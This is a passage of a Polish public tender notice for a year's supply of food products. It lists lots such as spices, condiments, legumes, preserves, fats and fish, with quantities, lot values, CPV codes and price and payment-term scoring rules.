4<br/>1	Bazylia suszona mielona	kg	20<br/>2	Biszkopty	kg	270<br/>3	Budyń czekoladowy	kg	150<br/>4	Budyń waniliowy	kg	400<br/>5	Cukier waniliowy	kg	80<br/>6	Curry w proszku	kg	20<br/>7	Cynamon mielony	kg	60<br/>8	Czosnek suszony granulowany	kg	55<br/>9	Galaretka niskosłodzona	kg	310<br/>10	Herbata granulowana	kg	1 250<br/>11	Kawa zbożowa	kg	2 400<br/>12	Kisiel	kg	280<br/>13	Kwasek cytrynowy	kg	60<br/>14	Liść laurowy	kg	85<br/>15	Majeranek	kg	85<br/>16	Papryka suszona ostra mielona kg	125<br/>17	Pieprz czarny mielony kg	230<br/>18	Proszek do pieczenia kg	105<br/>19	Przyprawa do mięsa typu fix kg	30<br/>20	Przyprawa do zup w płynie – typu maggi l	4 100<br/>21	Sól kuchenna jodowana warzona kg	3 900<br/>22	Ziele angielskie	kg	80 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 31920,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15620000-0 - Skrobia i produkty skrobiowe</p> <p class="mb-0">15831000-2 - Cukier</p> <p class="mb-0">15833100-7 - Desery</p> <p class="mb-0">15861000-1 - Kawa</p> <p class="mb-0">15863000-5 - Herbata</p> <p class="mb-0">15870000-7 - Przyprawy i przyprawy korzenne</p> <p class="mb-0">15871000-4 - Ocet; sosy; mieszanki przypraw; mąka i mączka z gorczycy; gotowa musztarda</p> <p class="mb-0">15871200-6 - Sosy, mieszanki przypraw i mieszanki przypraw korzennych</p> <p class="mb-0">15871270-7 - Mieszanki przypraw</p> <p class="mb-0">15872000-1 - Zioła i przyprawy korzenne</p> <p class="mb-0">15872100-2 - Pieprz</p> <p class="mb-0">15872400-5 - Sól</p> <p class="mb-0">15882000-4 - Produkty dietetyczne</p> <p class="mb-0">15890000-3 - Różne produkty spożywcze i produkty suszone</p> <p class="mb-0">15899000-6 - Proszek do pieczenia</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wybór oferty dokonany zostanie na podstawie niżej przedstawionych kryteriów, przy czym oferta na każdą część podlega odrębnej ocenie:<br/><br/>Wykonawca, który przedstawi najniższą cenę otrzyma maksymalną ilość 60 punktów, pozostali wykonawcy otrzymają proporcjonalnie mniej punktów, stosownie do wzoru:<br/><br/> najniższa cena brutto spośród oferowanych (Cn)<br/> Uzyskana liczba punktów (Xc) = ------------------------------------------------------- x 60<br/> cena brutto z oferty badanej (Cb)<br/><br/>Zamawiający będzie przyznawał punkty za ww. kryterium z dokładnością do dwóch miejsc po przecinku.<br/><br/>b) Termin płatności max. (Xt) 40% – nie może być krótszy niż 21 dni<br/>Za powyższe kryterium można otrzymać następującą ilość punktów:<br/>- termin płatności 30 dni – 40 pkt<br/>- termin płatności 21 dni - 20 pkt<br/>W przypadku nie zaznaczenia w formularzu ofertowego proponowanego terminu płatności Zamawiający automatycznie przyjmuje termin płatności 21 dni oraz 20 pkt w tym kryterium.<br/><br/>c) Sposób obliczenia wartości punktowej całej oferty<br/>Wartość punktowa całej oferty (Wo) = wartość punktowa ocenianej oferty za cenę (Xc) + wartość punktowa ocenianej oferty za termin płatności (Xt)<br/>Wartość punktowa całej oferty będzie przyznana z dokładnością do dwóch miejsc po przecinku. Oferty oceniane będą punktowo. Maksymalna ilość punktów, jaką po uwzględnieniu wagi kryteriów może osiągnąć oferta wynosi 100 pkt. Zamawiający udzieli zamówienia Wykonawcy, którego oferta którego oferta zostanie uznana za najkorzystniejszą t.j. uzyska największą ilość punktów. <br/>Zamawiający powiadomi o wynikach postępowania wszystkich wykonawców, którzy złożyli oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dodatki do potraw<br/>L.p.	Nazwa artykułu	j.m.	Szacunkowa ilość<br/>1	2	3	4<br/>1	Ketchup łagodny	kg	1 000<br/>2	Majonez	kg	2 100<br/>3	Musztarda	kg	2 400<br/>4	Ocet spirytusowy 10% l	1 600 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 15137,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15871000-4 - Ocet; sosy; mieszanki przypraw; mąka i mączka z gorczycy; gotowa musztarda</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15871110-8 - Ocet lub produkty równoważne</p> <p class="mb-0">15871230-5 - Ketchup</p> <p class="mb-0">15871250-1 - Musztarda</p> <p class="mb-0">15871273-8 - Majonez</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wybór oferty dokonany zostanie na podstawie niżej przedstawionych kryteriów, przy czym oferta na każdą część podlega odrębnej ocenie:<br/><br/>Wykonawca, który przedstawi najniższą cenę otrzyma maksymalną ilość 60 punktów, pozostali wykonawcy otrzymają proporcjonalnie mniej punktów, stosownie do wzoru:<br/><br/> najniższa cena brutto spośród oferowanych (Cn)<br/> Uzyskana liczba punktów (Xc) = ------------------------------------------------------- x 60<br/> cena brutto z oferty badanej (Cb)<br/><br/>Zamawiający będzie przyznawał punkty za ww. kryterium z dokładnością do dwóch miejsc po przecinku.<br/><br/>b) Termin płatności max. (Xt) 40% – nie może być krótszy niż 21 dni<br/>Za powyższe kryterium można otrzymać następującą ilość punktów:<br/>- termin płatności 30 dni – 40 pkt<br/>- termin płatności 21 dni - 20 pkt<br/>W przypadku nie zaznaczenia w formularzu ofertowego proponowanego terminu płatności Zamawiający automatycznie przyjmuje termin płatności 21 dni oraz 20 pkt w tym kryterium.<br/><br/>c) Sposób obliczenia wartości punktowej całej oferty<br/>Wartość punktowa całej oferty (Wo) = wartość punktowa ocenianej oferty za cenę (Xc) + wartość punktowa ocenianej oferty za termin płatności (Xt)<br/>Wartość punktowa całej oferty będzie przyznana z dokładnością do dwóch miejsc po przecinku. Oferty oceniane będą punktowo. Maksymalna ilość punktów, jaką po uwzględnieniu wagi kryteriów może osiągnąć oferta wynosi 100 pkt. Zamawiający udzieli zamówienia Wykonawcy, którego oferta którego oferta zostanie uznana za najkorzystniejszą t.j. uzyska największą ilość punktów. <br/>Zamawiający powiadomi o wynikach postępowania wszystkich wykonawców, którzy złożyli oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Produkty sojowe<br/>L.p.	Nazwa artykułu	j.m.	Szacunkowa ilość<br/>1	Kotlety sojowe	kg	650 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 4160,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15890000-3 - Różne produkty spożywcze i produkty suszone</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wybór oferty dokonany zostanie na podstawie niżej przedstawionych kryteriów, przy czym oferta na każdą część podlega odrębnej ocenie:<br/><br/>Wykonawca, który przedstawi najniższą cenę otrzyma maksymalną ilość 60 punktów, pozostali wykonawcy otrzymają proporcjonalnie mniej punktów, stosownie do wzoru:<br/><br/> najniższa cena brutto spośród oferowanych (Cn)<br/> Uzyskana liczba punktów (Xc) = ------------------------------------------------------- x 60<br/> cena brutto z oferty badanej (Cb)<br/><br/>Zamawiający będzie przyznawał punkty za ww. kryterium z dokładnością do dwóch miejsc po przecinku.<br/><br/>b) Termin płatności max. (Xt) 40% – nie może być krótszy niż 21 dni<br/>Za powyższe kryterium można otrzymać następującą ilość punktów:<br/>- termin płatności 30 dni – 40 pkt<br/>- termin płatności 21 dni - 20 pkt<br/>W przypadku nie zaznaczenia w formularzu ofertowego proponowanego terminu płatności Zamawiający automatycznie przyjmuje termin płatności 21 dni oraz 20 pkt w tym kryterium.<br/><br/>c) Sposób obliczenia wartości punktowej całej oferty<br/>Wartość punktowa całej oferty (Wo) = wartość punktowa ocenianej oferty za cenę (Xc) + wartość punktowa ocenianej oferty za termin płatności (Xt)<br/>Wartość punktowa całej oferty będzie przyznana z dokładnością do dwóch miejsc po przecinku. Oferty oceniane będą punktowo. Maksymalna ilość punktów, jaką po uwzględnieniu wagi kryteriów może osiągnąć oferta wynosi 100 pkt. Zamawiający udzieli zamówienia Wykonawcy, którego oferta którego oferta zostanie uznana za najkorzystniejszą t.j. uzyska największą ilość punktów. <br/>Zamawiający powiadomi o wynikach postępowania wszystkich wykonawców, którzy złożyli oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Produkty strączkowe<br/>L.p.	Nazwa artykułu	j.m.	Szacunkowa ilość<br/>1	Fasola JAŚ średni	kg	10 000<br/>2	Groch łuskany	kg	7 000 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 39750,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15331000-7 - Warzywa przetworzone</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15331130-7 - Fasola, groch, papryki, pomidory i pozostałe warzywa</p> <p class="mb-0">15331132-1 - Groch przetworzony</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wybór oferty dokonany zostanie na podstawie niżej przedstawionych kryteriów, przy czym oferta na każdą część podlega odrębnej ocenie:<br/><br/>Wykonawca, który przedstawi najniższą cenę otrzyma maksymalną ilość 60 punktów, pozostali wykonawcy otrzymają proporcjonalnie mniej punktów, stosownie do wzoru:<br/><br/> najniższa cena brutto spośród oferowanych (Cn)<br/> Uzyskana liczba punktów (Xc) = ------------------------------------------------------- x 60<br/> cena brutto z oferty badanej (Cb)<br/><br/>Zamawiający będzie przyznawał punkty za ww. kryterium z dokładnością do dwóch miejsc po przecinku.<br/><br/>b) Termin płatności max. (Xt) 40% – nie może być krótszy niż 21 dni<br/>Za powyższe kryterium można otrzymać następującą ilość punktów:<br/>- termin płatności 30 dni – 40 pkt<br/>- termin płatności 21 dni - 20 pkt<br/>W przypadku nie zaznaczenia w formularzu ofertowego proponowanego terminu płatności Zamawiający automatycznie przyjmuje termin płatności 21 dni oraz 20 pkt w tym kryterium.<br/><br/>c) Sposób obliczenia wartości punktowej całej oferty<br/>Wartość punktowa całej oferty (Wo) = wartość punktowa ocenianej oferty za cenę (Xc) + wartość punktowa ocenianej oferty za termin płatności (Xt)<br/>Wartość punktowa całej oferty będzie przyznana z dokładnością do dwóch miejsc po przecinku. Oferty oceniane będą punktowo. Maksymalna ilość punktów, jaką po uwzględnieniu wagi kryteriów może osiągnąć oferta wynosi 100 pkt. Zamawiający udzieli zamówienia Wykonawcy, którego oferta którego oferta zostanie uznana za najkorzystniejszą t.j. uzyska największą ilość punktów. <br/>Zamawiający powiadomi o wynikach postępowania wszystkich wykonawców, którzy złożyli oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przetwory warzywne<br/>L.p.	Nazwa artykułu	j.m.	Szacunkowa ilość<br/>1	Chrzan tarty	kg	165<br/>2	Fasolka szparagowa	kg	700<br/>3	Groszek konserwowy	kg	1 400<br/>4	Koncentrat pomidorowy 30%	kg	6 300<br/>5	Kukurydza konserwowa	kg	2 000<br/>6	Leczo pieczarkowe	kg	2 800<br/>7	Pieczarki pasteryzowane	kg	250 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 44060,50 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15331000-7 - Warzywa przetworzone</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15331135-2 - Grzyby przetworzone</p> <p class="mb-0">15331400-1 - Warzywa konserwowane i/lub puszkowane</p> <p class="mb-0">15331427-6 - Skoncentrowany przecier pomidorowy</p> <p class="mb-0">15331430-0 - Grzyby puszkowane</p> <p class="mb-0">15331462-3 - Groch puszkowany</p> <p class="mb-0">15331464-7 - Puszkowana cała fasola</p> <p class="mb-0">15331470-2 - Kukurydza słodka</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wybór oferty dokonany zostanie na podstawie niżej przedstawionych kryteriów, przy czym oferta na każdą część podlega odrębnej ocenie:<br/><br/>Wykonawca, który przedstawi najniższą cenę otrzyma maksymalną ilość 60 punktów, pozostali wykonawcy otrzymają proporcjonalnie mniej punktów, stosownie do wzoru:<br/><br/> najniższa cena brutto spośród oferowanych (Cn)<br/> Uzyskana liczba punktów (Xc) = ------------------------------------------------------- x 60<br/> cena brutto z oferty badanej (Cb)<br/><br/>Zamawiający będzie przyznawał punkty za ww. kryterium z dokładnością do dwóch miejsc po przecinku.<br/><br/>b) Termin płatności max. (Xt) 40% – nie może być krótszy niż 21 dni<br/>Za powyższe kryterium można otrzymać następującą ilość punktów:<br/>- termin płatności 30 dni – 40 pkt<br/>- termin płatności 21 dni - 20 pkt<br/>W przypadku nie zaznaczenia w formularzu ofertowego proponowanego terminu płatności Zamawiający automatycznie przyjmuje termin płatności 21 dni oraz 20 pkt w tym kryterium.<br/><br/>c) Sposób obliczenia wartości punktowej całej oferty<br/>Wartość punktowa całej oferty (Wo) = wartość punktowa ocenianej oferty za cenę (Xc) + wartość punktowa ocenianej oferty za termin płatności (Xt)<br/>Wartość punktowa całej oferty będzie przyznana z dokładnością do dwóch miejsc po przecinku. Oferty oceniane będą punktowo. Maksymalna ilość punktów, jaką po uwzględnieniu wagi kryteriów może osiągnąć oferta wynosi 100 pkt. Zamawiający udzieli zamówienia Wykonawcy, którego oferta którego oferta zostanie uznana za najkorzystniejszą t.j. uzyska największą ilość punktów. <br/>Zamawiający powiadomi o wynikach postępowania wszystkich wykonawców, którzy złożyli oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przetwory owocowe<br/>L.p.	Nazwa artykułu	j.m.	Szacunkowa ilość<br/>1	Dżem brzoskwiniowy	kg	4 000<br/>2	Dżem truskawkowy	kg	4 000<br/>3	Kompot truskawkowy	l	120<br/>4	Marmolada wieloowocowa	kg	7 000<br/>5	Miód naturalny	kg	35 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 36354,40 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15332100-5 - Przetworzone owoce</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15332100-5 - Przetworzone owoce</p> <p class="mb-0">15332230-5 - Marmolady</p> <p class="mb-0">15332290-3 - Dżemy</p> <p class="mb-0">15831600-8 - Miód</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wybór oferty dokonany zostanie na podstawie niżej przedstawionych kryteriów, przy czym oferta na każdą część podlega odrębnej ocenie:<br/><br/>Wykonawca, który przedstawi najniższą cenę otrzyma maksymalną ilość 60 punktów, pozostali wykonawcy otrzymają proporcjonalnie mniej punktów, stosownie do wzoru:<br/><br/> najniższa cena brutto spośród oferowanych (Cn)<br/> Uzyskana liczba punktów (Xc) = ------------------------------------------------------- x 60<br/> cena brutto z oferty badanej (Cb)<br/><br/>Zamawiający będzie przyznawał punkty za ww. kryterium z dokładnością do dwóch miejsc po przecinku.<br/><br/>b) Termin płatności max. (Xt) 40% – nie może być krótszy niż 21 dni<br/>Za powyższe kryterium można otrzymać następującą ilość punktów:<br/>- termin płatności 30 dni – 40 pkt<br/>- termin płatności 21 dni - 20 pkt<br/>W przypadku nie zaznaczenia w formularzu ofertowego proponowanego terminu płatności Zamawiający automatycznie przyjmuje termin płatności 21 dni oraz 20 pkt w tym kryterium.<br/><br/>c) Sposób obliczenia wartości punktowej całej oferty<br/>Wartość punktowa całej oferty (Wo) = wartość punktowa ocenianej oferty za cenę (Xc) + wartość punktowa ocenianej oferty za termin płatności (Xt)<br/>Wartość punktowa całej oferty będzie przyznana z dokładnością do dwóch miejsc po przecinku. Oferty oceniane będą punktowo. Maksymalna ilość punktów, jaką po uwzględnieniu wagi kryteriów może osiągnąć oferta wynosi 100 pkt. Zamawiający udzieli zamówienia Wykonawcy, którego oferta którego oferta zostanie uznana za najkorzystniejszą t.j. uzyska największą ilość punktów. <br/>Zamawiający powiadomi o wynikach postępowania wszystkich wykonawców, którzy złożyli oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 10</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Tłuszcze<br/>L.p.	Nazwa artykułu	j.m.	Szacunkowa ilość<br/>1	Masło	kg	50<br/>2	Margaryna do smarowania pieczywa	kg	28 000<br/>3	Olej roślinny jadalny	l	4 300 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 108890,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15430000-1 - Tłuszcze jadalne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15411100-3 - Olej roślinny</p> <p class="mb-0">15431100-9 - Margaryna</p> <p class="mb-0">15530000-2 - Masło</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wybór oferty dokonany zostanie na podstawie niżej przedstawionych kryteriów, przy czym oferta na każdą część podlega odrębnej ocenie:<br/><br/>Wykonawca, który przedstawi najniższą cenę otrzyma maksymalną ilość 60 punktów, pozostali wykonawcy otrzymają proporcjonalnie mniej punktów, stosownie do wzoru:<br/><br/> najniższa cena brutto spośród oferowanych (Cn)<br/> Uzyskana liczba punktów (Xc) = ------------------------------------------------------- x 60<br/> cena brutto z oferty badanej (Cb)<br/><br/>Zamawiający będzie przyznawał punkty za ww. kryterium z dokładnością do dwóch miejsc po przecinku.<br/><br/>b) Termin płatności max. (Xt) 40% – nie może być krótszy niż 21 dni<br/>Za powyższe kryterium można otrzymać następującą ilość punktów:<br/>- termin płatności 30 dni – 40 pkt<br/>- termin płatności 21 dni - 20 pkt<br/>W przypadku nie zaznaczenia w formularzu ofertowego proponowanego terminu płatności Zamawiający automatycznie przyjmuje termin płatności 21 dni oraz 20 pkt w tym kryterium.<br/><br/>c) Sposób obliczenia wartości punktowej całej oferty<br/>Wartość punktowa całej oferty (Wo) = wartość punktowa ocenianej oferty za cenę (Xc) + wartość punktowa ocenianej oferty za termin płatności (Xt)<br/>Wartość punktowa całej oferty będzie przyznana z dokładnością do dwóch miejsc po przecinku. Oferty oceniane będą punktowo. Maksymalna ilość punktów, jaką po uwzględnieniu wagi kryteriów może osiągnąć oferta wynosi 100 pkt. Zamawiający udzieli zamówienia Wykonawcy, którego oferta którego oferta zostanie uznana za najkorzystniejszą t.j. uzyska największą ilość punktów. <br/>Zamawiający powiadomi o wynikach postępowania wszystkich wykonawców, którzy złożyli oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 11</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Ryby i przetwory rybne<br/>L.p.	Nazwa artykułu	j.m.	Szacunkowa ilość<br/>1	Burgery rybne panierowane mrożone	kg	4 200<br/>2	Miruna	kg	450<br/>3	Śledź solony typu matias	kg	160<br/>4	Paprykarz szczeciński	kg	2 500<br/>5	Sałatka rybna	kg	2 500 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 58805,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15200000-0 - Ryby przetworzone i konserwowane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15220000-6 - Ryby mrożone, filety rybne i pozostałe mięso ryb</p> <p class="mb-0">15221000-3 - Ryby mrożone</p> <p class="mb-0">15243000-3 - Przetwory z ryb</p> <h3 class="mb-0">4.2.8.) Zamówienie 